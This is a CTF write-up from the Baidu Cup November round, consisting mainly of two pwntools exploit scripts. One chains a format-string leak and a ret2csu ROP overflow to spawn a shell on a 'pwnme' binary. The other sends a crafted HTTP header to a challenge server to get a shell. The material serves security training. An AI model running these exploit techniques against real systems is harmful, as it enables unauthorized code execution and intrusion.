百度杯十一月场

  • 会飞的鱼
  • March 5, 2019

题目链接

1.pwnme

格式化字符串漏洞,rop,数据类型强制转换

from pwn import*

# Target selection: the local binary is used here; the commented line is the
# event's remote endpoint, kept only as a record of the original setup.
#p=remote('106.75.2.53', 10006)
p= process('./pwnme')

def leak(addr):
    """DynELF leak callback: return the bytes stored at *addr*.

    Drives the menu: option 2 writes a new username/password, and the password
    field is where the format-string directive ``%12$s`` is planted together
    with a marker and the raw address; option 1 then echoes the result back.
    The address sits right after the marker so the ``%12$s`` argument slot
    dereferences it (stack offset assumed from the original write-up).

    Returns the leaked bytes, or a single NUL byte when the echo contains
    nothing beyond the 5-byte directive and the 7-byte marker (i.e. the target
    byte was 0).
    """
    marker = 'BIRDGO!'
    directive = '%12$s'
    p.recvuntil('>')
    p.sendline('2')
    p.recvuntil('please input new username(max lenth:20): \n')
    p.sendline('aaaa')
    p.recvuntil('please input new password(max lenth:20): \n')
    p.send(directive + marker + p64(addr))
    p.recvuntil('>')
    p.sendline('1')
    echoed = p.recvuntil(marker)
    if len(echoed) == len(directive) + len(marker):
        return '\x00'
    return echoed[len(directive):-len(marker)]

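# Leak system()'s address: log in once so the menu becomes reachable, then let
# DynELF resolve 'system' in libc through the format-string read primitive.
# NOTE: the original uses `//` for the two trailing comments below, which is
# Python's floor-division operator and makes the script a syntax error; they
# are proper `#` comments here.
p.recvuntil('Input your username(max lenth:40): \n')
p.sendline('A')
p.recvuntil('Input your password(max lenth:40): \n')
p.sendline('1')

d = DynELF(leak, elf=ELF('./pwnme'))
system_addr = d.lookup('system', 'libc')
log.info('system_addr:%#x' % system_addr)

# Second pass through option 2: the password field is the overflowing one
# (0x28 bytes of filler before the saved return address is overwritten).
p.recvuntil('>')
p.sendline('2')
p.recvuntil('please input new username(max lenth:20): \n')
p.sendline('cccc')
p.recvuntil('please input new password(max lenth:20): \n')

# Binary-specific constants (the write-up gives no disassembly; the gadget
# roles below assume the usual __libc_csu_init layout — confirm in IDA/objdump).
pppppr = 0x0000000000400ecb        # presumably: pop rbp; pop r12; pop r13; pop r14; pop r15; ret
pop_rdi_ret = 0x0000000000400ed3
init_addr = 0x400EB0               # presumably: mov rdx,r13; mov rsi,r14; mov edi,r15d; call [r12+rbx*8]
binsh_addr = 0x0000000000602000    # writable slot that will receive "/bin/sh\0"
read_got = 0x0000000000601FC8

# ret2csu chain: read(0, binsh_addr, 8) through read's GOT entry, then
# pop rdi; binsh_addr; system.
payload = 'a' * 0x28
# rbp=1 (loop exit), r12=&read@got (call target), r13=8 (rdx), r14=binsh (rsi), r15=0 (edi)
payload += p64(pppppr) + p64(1) + p64(read_got) + p64(0x8) + p64(binsh_addr) + p64(0)
# Why 7 dummies: after the call, the csu epilogue presumably does `add rsp, 8`
# and then pops rbx, rbp, r12, r13, r14, r15 — seven qwords consumed before
# its `ret` reaches pop_rdi_ret.  Verify against the disassembly.
payload += p64(init_addr) + p64(0) * 7
payload += p64(pop_rdi_ret) + p64(binsh_addr) + p64(system_addr)
payload = payload.ljust(0x101, 'a')

# NOTE: str payloads concatenated with p64() only work with pwntools on
# Python 2; on Python 3 these would all have to be bytes.
p.sendline(payload)
p.sendline('/bin/sh\x00')   # satisfies the read() issued by the chain (8 bytes)

p.interactive()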

2. 3.7z

from pwn import*

# Target selection: the remote endpoint is the event's challenge server; the
# commented line is the local binary used while developing the script.
#p=process('./http')
p=remote('106.75.2.53', 80)

def check(data):
    """Encode *data* by XOR-ing each character with its 0-based position.

    Returns a new string of the same length.  The first character is left as
    is, since ``0 ^ c == c``; this reproduces whatever transformation the
    challenge's server applies to the User-Agent value before comparing it.
    """
    return ''.join(chr(idx ^ ord(ch)) for idx, ch in enumerate(data))

# Request: the encoded User-Agent value, a "token" field carrying the command
# string, and the blank line that terminates an HTTP header block.
# NOTE(review): no CRLF separates the two fields here; presumably the
# challenge's parser only scans for the field names — confirm before changing.
request_parts = (
    'User-Agent: ', check('useragent'),
    'token: ', '/bin/sh',
    '\r\n\r\n',
)
payload = ''.join(request_parts)

p.sendline(payload)

p.interactive()